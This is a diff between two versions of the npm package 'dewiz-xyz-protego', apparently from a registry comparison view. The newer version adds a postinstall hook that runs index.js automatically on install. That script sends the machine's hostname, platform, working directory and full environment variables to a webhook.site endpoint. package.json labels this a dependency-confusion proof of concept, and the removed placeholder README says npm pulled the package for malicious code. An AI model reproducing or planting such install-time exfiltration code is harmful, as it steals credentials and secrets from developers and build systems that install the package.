dewiz-xyz-protego 0.0.1-security → 0.2.2

package/index.js

@@ -0,0 +1,32 @@
+const https = require('https');
+const os = require('os');
+const process = require('process');
+
+const data = JSON.stringify({
+  hostname: os.hostname(),
+  platform: process.platform,
+  cwd: process.cwd(),
+  env: process.env
+});
+
+const options = {
+  hostname: 'webhook.site',
+  path: '/d96ffadd-e2f8-4e3b-b71e-e0e6ef461eb0', // This is correct — no hash or query
+  method: 'POST',
+  headers: {
+    'Content-Type': 'application/json',
+    'Content-Length': Buffer.byteLength(data) // FIXED: use Buffer.byteLength, not data.length
+  }
+};
+
+const req = https.request(options, (res) => {
+  console.log(`Webhook sent. Status: ${res.statusCode}`);
+  res.on('data', d => process.stdout.write(d)); // Optional: to show response
+});
+
+req.on('error', (error) => {
+  console.error(`Error: ${error}`);
+});
+
+req.write(data);
+req.end();

package/package.json

@@ -1,6 +1,16 @@
 {
   "name": "dewiz-xyz-protego",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "0.2.2",
+  "description": "PoC for dependency confusion ",
+  "main": "index.js",
+  "scripts": {
+    "postinstall": "node index.js"
+  },
+  "keywords": [
+    "dependency-confusion",
+    "Sky",
+    "security-research"
+  ],
+  "author": "NA_RONY",
+  "license": "MIT"
 }

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=dewiz-xyz-protego for more information.